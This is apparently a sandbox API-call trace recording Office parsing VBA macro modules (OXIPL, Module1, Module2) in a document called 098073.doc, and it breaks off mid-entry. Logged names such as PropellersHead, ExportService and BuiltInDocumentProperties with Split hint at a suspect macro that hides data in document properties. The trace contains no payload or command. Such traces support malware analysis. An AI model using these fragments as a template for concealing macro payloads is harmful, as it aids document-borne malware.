[0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.247] CExposedStream::Read () returned 0x0 [0030.247] CExposedStream::Release () returned 0x1 [0030.247] CExposedStream::Release () returned 0x0 [0030.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OXIPL", cchWideChar=6, lpMultiByteStr=0x2e6560, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OXIPL", lpUsedDefaultChar=0x0) returned 6 [0030.248] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OXIPL") returned 0x100035 [0030.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OXIPL", cchWideChar=6, lpMultiByteStr=0x2e66a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OXIPL", lpUsedDefaultChar=0x0) returned 6 [0030.248] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OXIPL") returned 0x100035 [0030.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7837db0 [0030.248] IMalloc:GetSize (This=0x7fefe015380, pv=0x7837db0) returned 0x80 [0030.248] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0xb51d700 [0030.248] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0xb51d7c0 [0030.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OXIPL", cchWideChar=6, lpMultiByteStr=0x2e6560, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OXIPL", lpUsedDefaultChar=0x0) returned 6 [0030.248] CoCreateGuid (in: pguid=0x2e6290 | out: pguid=0x2e6290*(Data1=0xcdf42d8c, Data2=0xfd09, Data3=0x4f14, Data4=([0]=0x97, [1]=0xc, [2]=0x97, [3]=0xf1, [4]=0x90, [5]=0x6a, [6]=0xe4, [7]=0xa5))) returned 0x0 [0030.248] CoCreateGuid (in: pguid=0x2e62a0 | out: pguid=0x2e62a0*(Data1=0xb0048c0f, Data2=0x6213, Data3=0x48a2, Data4=([0]=0xa9, [1]=0x57, [2]=0x5, [3]=0x21, [4]=0xef, [5]=0xc9, [6]=0x11, [7]=0x66))) returned 0x0 [0030.248] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OXIPL", cchWideChar=6, lpMultiByteStr=0x2e62b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OXIPL", lpUsedDefaultChar=0x0) returned 6 [0030.248] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OXIPL") returned 0x100035 [0030.248] GetLocalTime (in: lpSystemTime=0x2e6188 | out: lpSystemTime=0x2e6188*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x21, wMilliseconds=0x91)) [0030.248] _ultow_s (in: _Value=0x5b6852dd, _Buffer=0xb4c65d4, _BufferCount=0x9, _Radix=16 | out: _Buffer="5b6852dd") returned 0x0 [0030.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="055b6852dd", cchWideChar=11, lpMultiByteStr=0x2e6120, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="055b6852dd", lpUsedDefaultChar=0x0) returned 11 [0030.248] strcpy_s (in: _Dst=0x78013c0, _DstSize=0x6, _Src="OXIPL" | out: _Dst="OXIPL") returned 0x0 [0030.248] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OXIPL") returned 0x100035 [0030.248] wcscpy_s (in: _Destination=0xb4c6630, _SizeInWords=0x6, _Source="OXIPL" | out: _Destination="OXIPL") returned 0x0 [0030.248] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OXIPL") returned 0x100035 [0030.248] wcscpy_s (in: _Destination=0xb4c6960, _SizeInWords=0x6, _Source="OXIPL" | out: _Destination="OXIPL") returned 0x0 [0030.248] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OXIPL") returned 0x100035 [0030.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x84) returned 0x7837e40 [0030.248] IMalloc:Free (This=0x7fefe015380, pv=0xb4c70d0) [0030.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7668640 [0030.248] IMalloc:Free (This=0x7fefe015380, pv=0x7837e40) [0030.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x3d0) returned 0xb513930 [0030.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7668640 [0030.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490410 [0030.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7837e40 [0030.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6080 [0030.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6060 [0030.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x688) returned 0xb5224f0 [0030.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7837ed0 [0030.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x640) returned 0xb522b80 [0030.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7668610 [0030.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f60a0 [0030.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f60b0 [0030.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76685e0 [0030.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7837f60 [0030.248] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0030.248] wcsncpy_s (in: _Destination=0x2e6300, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0x0 [0030.249] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", cchLength=0x27 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc") returned 0x27 [0030.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", cchWideChar=40, lpMultiByteStr=0x2e6230, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", lpUsedDefaultChar=0x0) returned 40 [0030.249] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned -4 [0030.249] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0 [0030.249] CExposedDocFile::AddRef () returned 0x7 [0030.249] CExposedDocFile::AddRef () returned 0x8 [0030.249] CExposedDocFile::OpenStream () returned 0x0 [0030.249] CExposedDocFile::Release () returned 0x7 [0030.249] CExposedStream::Seek () returned 0x0 [0030.249] CExposedStream::AddRef () returned 0x2 [0030.249] CExposedStream::Read () returned 0x0 [0030.249] CExposedStream::AddRef () returned 0x3 [0030.249] CExposedStream::Release () returned 0x2 [0030.249] IMalloc:Alloc (This=0x7fefe015380, cb=0x2ee0) returned 0xb5231d0 [0030.249] CExposedStream::Read () returned 0x0 [0030.249] CExposedStream::Read () returned 0x0 [0030.249] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.249] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0030.249] IMalloc:Alloc (This=0x7fefe015380, cb=0x6) returned 0xb4f60c0 [0030.249] IMalloc:Alloc (This=0x7fefe015380, cb=0xc) returned 0xb4904f0 [0030.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb4f60c0, cbMultiByte=6, lpWideCharStr=0xb4904f0, cchWideChar=6 | out: lpWideCharStr="OXIPL") returned 6 [0030.249] IMalloc:Free (This=0x7fefe015380, pv=0xb4f60c0) [0030.249] IMalloc:Free (This=0x7fefe015380, pv=0xb4904f0) [0030.249] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.249] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0030.249] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7668580 [0030.249] IMalloc:Alloc (This=0x7fefe015380, cb=0x50) returned 0x7808fa0 [0030.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7668580, cbMultiByte=40, lpWideCharStr=0x7808fa0, cchWideChar=40 | out: lpWideCharStr="0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}") returned 40 [0030.249] IMalloc:Alloc (This=0x7fefe015380, cb=0x50) returned 0x7809000 [0030.249] IMalloc:Free (This=0x7fefe015380, pv=0x7668580) [0030.250] IMalloc:Free (This=0x7fefe015380, pv=0x7808fa0) [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_GlobalNameSpace") returned 0x10ce77 [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Challenge") returned 0x106bdc [0030.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a515ae, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0030.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a515ae, cbMultiByte=9, lpWideCharStr=0x766cf98, cchWideChar=9 | out: lpWideCharStr="Challenge") returned 9 [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sender") returned 0x1050e8 [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="e") returned 0x10105c [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AnimTransferMap2") returned 0x1067d9 [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AnimTransferMap2") returned 0x1067d9 [0030.250] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.251] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.251] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.251] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.251] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PropellersHead") returned 0x108b25 [0030.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51636, cbMultiByte=14, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0030.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51636, cbMultiByte=14, lpWideCharStr=0x76d6748, cchWideChar=14 | out: lpWideCharStr="PropellersHead") returned 14 [0030.251] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.251] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0030.251] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tt") returned 0x105f4d [0030.251] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0030.251] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BuiltInDocumentProperties") returned 0x10bb5f [0030.251] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Value") returned 0x104be4 [0030.251] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AlertN") returned 0x100fb3 [0030.251] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Split") returned 0x10298d [0030.251] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tt") returned 0x105f4d [0030.251] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VertikName") returned 0x10288c [0030.251] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AlertN") returned 0x100fb3 [0030.251] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Quubo") returned 0x101120 [0030.251] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Vertik") returned 0x10019f [0030.251] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PropellersHead") returned 0x108b25 [0030.251] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="PropellersHead" | out: _Dst="PropellersHead") returned 0x0 [0030.251] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.251] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.251] CExposedStream::Read () returned 0x0 [0030.251] CExposedStream::Release () returned 0x1 [0030.251] CExposedStream::Release () returned 0x0 [0030.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Module1", cchWideChar=8, lpMultiByteStr=0x2e65f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module1", lpUsedDefaultChar=0x0) returned 8 [0030.251] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module1") returned 0x101162 [0030.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Module1", cchWideChar=8, lpMultiByteStr=0x2e6730, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module1", lpUsedDefaultChar=0x0) returned 8 [0030.251] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module1") returned 0x101162 [0030.252] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7837ed0 [0030.252] IMalloc:GetSize (This=0x7fefe015380, pv=0x7837ed0) returned 0x80 [0030.252] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0xb51d940 [0030.252] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0xb51da00 [0030.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Module1", cchWideChar=8, lpMultiByteStr=0x2e65f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module1", lpUsedDefaultChar=0x0) returned 8 [0030.252] CoCreateGuid (in: pguid=0x2e6320 | out: pguid=0x2e6320*(Data1=0xd64fa01f, Data2=0xd357, Data3=0x4fa0, Data4=([0]=0xa4, [1]=0x9a, [2]=0xa6, [3]=0xed, [4]=0x37, [5]=0xc5, [6]=0x19, [7]=0x5a))) returned 0x0 [0030.252] CoCreateGuid (in: pguid=0x2e6330 | out: pguid=0x2e6330*(Data1=0xbe19a3b9, Data2=0x6a50, Data3=0x437e, Data4=([0]=0xac, [1]=0xfa, [2]=0xae, [3]=0x5d, [4]=0xd, [5]=0xe7, [6]=0x65, [7]=0x3))) returned 0x0 [0030.252] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module1", cchWideChar=8, lpMultiByteStr=0x2e6340, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module1", lpUsedDefaultChar=0x0) returned 8 [0030.252] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module1") returned 0x101162 [0030.252] GetLocalTime (in: lpSystemTime=0x2e6218 | out: lpSystemTime=0x2e6218*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x21, wMilliseconds=0x91)) [0030.252] _ultow_s (in: _Value=0x5b6852dd, _Buffer=0xb4c6974, _BufferCount=0x9, _Radix=16 | out: _Buffer="5b6852dd") returned 0x0 [0030.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="065b6852dd", cchWideChar=11, lpMultiByteStr=0x2e61b0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="065b6852dd", lpUsedDefaultChar=0x0) returned 11 [0030.252] strcpy_s (in: _Dst=0x78013d0, _DstSize=0x8, _Src="Module1" | out: _Dst="Module1") returned 0x0 [0030.252] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module1") returned 0x101162 [0030.252] wcscpy_s (in: _Destination=0xb4c6988, _SizeInWords=0x8, _Source="Module1" | out: _Destination="Module1") returned 0x0 [0030.252] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module1") returned 0x101162 [0030.252] wcscpy_s (in: _Destination=0xb4c6998, _SizeInWords=0x8, _Source="Module1" | out: _Destination="Module1") returned 0x0 [0030.252] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module1") returned 0x101162 [0030.252] IMalloc:Alloc (This=0x7fefe015380, cb=0x90) returned 0xb4623a0 [0030.252] IMalloc:Free (This=0x7fefe015380, pv=0xb51d880) [0030.252] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7668850 [0030.252] IMalloc:Free (This=0x7fefe015380, pv=0xb4623a0) [0030.252] IMalloc:Alloc (This=0x7fefe015380, cb=0x3d0) returned 0xb523a70 [0030.252] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7668850 [0030.252] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4904f0 [0030.252] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7837f60 [0030.252] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f60a0 [0030.252] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6080 [0030.252] wcsncpy_s (in: _Destination=0x2e6300, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0x0 [0030.252] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", cchLength=0x27 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc") returned 0x27 [0030.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", cchWideChar=40, lpMultiByteStr=0x2e6230, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", lpUsedDefaultChar=0x0) returned 40 [0030.252] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned -4 [0030.252] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0 [0030.252] CExposedDocFile::AddRef () returned 0x8 [0030.252] CExposedDocFile::AddRef () returned 0x9 [0030.252] CExposedDocFile::OpenStream () returned 0x0 [0030.252] CExposedDocFile::Release () returned 0x8 [0030.252] CExposedStream::Seek () returned 0x0 [0030.252] IMalloc:Alloc (This=0x7fefe015380, cb=0x688) returned 0xb527a40 [0030.253] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7837ff0 [0030.253] IMalloc:Alloc (This=0x7fefe015380, cb=0x640) returned 0xb5280d0 [0030.253] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7668580 [0030.253] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f60c0 [0030.253] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f60d0 [0030.253] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76684f0 [0030.253] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7838080 [0030.253] CExposedStream::AddRef () returned 0x2 [0030.253] CExposedStream::Read () returned 0x0 [0030.253] CExposedStream::AddRef () returned 0x3 [0030.253] CExposedStream::Release () returned 0x2 [0030.253] IMalloc:Alloc (This=0x7fefe015380, cb=0x2ee0) returned 0xb528720 [0030.253] CExposedStream::Read () returned 0x0 [0030.253] CExposedStream::Read () returned 0x0 [0030.253] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0030.253] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.253] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0030.253] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f60e0 [0030.253] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490510 [0030.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb4f60e0, cbMultiByte=8, lpWideCharStr=0xb490510, cchWideChar=8 | out: lpWideCharStr="Module1") returned 8 [0030.253] IMalloc:Free (This=0x7fefe015380, pv=0xb4f60e0) [0030.253] IMalloc:Free (This=0x7fefe015380, pv=0xb490510) [0030.253] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.253] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.253] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ExportService") returned 0x106509 [0030.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822bc6, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0030.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822bc6, cbMultiByte=13, lpWideCharStr=0x76d6148, cchWideChar=13 | out: lpWideCharStr="ExportService") returned 13 [0030.253] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="D") returned 0x10105b [0030.253] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="doc_string") returned 0x105248 [0030.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fb") returned 0x105d35 [0030.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OXIPL") returned 0x100035 [0030.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Set") returned 0x10d36e [0030.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fb") returned 0x105d35 [0030.254] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="fb" | out: _Dst="fb") returned 0x0 [0030.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="New") returned 0x10b8b3 [0030.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OXIPL") returned 0x100035 [0030.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="doc_string") returned 0x105248 [0030.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fb") returned 0x105d35 [0030.254] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="fb" | out: _Dst="fb") returned 0x0 [0030.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PropellersHead") returned 0x108b25 [0030.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.254] CExposedStream::Read () returned 0x0 [0030.254] CExposedStream::Release () returned 0x1 [0030.254] CExposedStream::Release () returned 0x0 [0030.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Module2", cchWideChar=8, lpMultiByteStr=0x2e65f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module2", lpUsedDefaultChar=0x0) returned 8 [0030.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module2") returned 0x101163 [0030.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Module2", cchWideChar=8, lpMultiByteStr=0x2e6730, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module2", lpUsedDefaultChar=0x0) returned 8 [0030.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module2") returned 0x101163 [0030.254] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7838080 [0030.254] IMalloc:GetSize (This=0x7fefe015380, pv=0x7838080) returned 0x80 [0030.254] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0xb51d880 [0030.254] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0xb51dac0 [0030.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Module2", cchWideChar=8, lpMultiByteStr=0x2e65f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module2", lpUsedDefaultChar=0x0) returned 8 [0030.254] CoCreateGuid (in: pguid=0x2e6320 | out: pguid=0x2e6320*(Data1=0x23272808, Data2=0x9cd1, Data3=0x4d9d, Data4=([0]=0x85, [1]=0x14, [2]=0xd9, [3]=0x9a, [4]=0xf5, [5]=0x19, [6]=0x8b, [7]=0xb6))) returned 0x0 [0030.254] CoCreateGuid (in: pguid=0x2e6330 | out: pguid=0x2e6330*(Data1=0x7b91a237, Data2=0x9c8f, Data3=0x4d0e, Data4=([0]=0xa1, [1]=0xb7, [2]=0xf2, [3]=0x99, [4]=0x18, [5]=0x6b, [6]=0x99, [7]=0xa4))) returned 0x0 [0030.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module2", cchWideChar=8, lpMultiByteStr=0x2e6340, cbMultiByte=16, 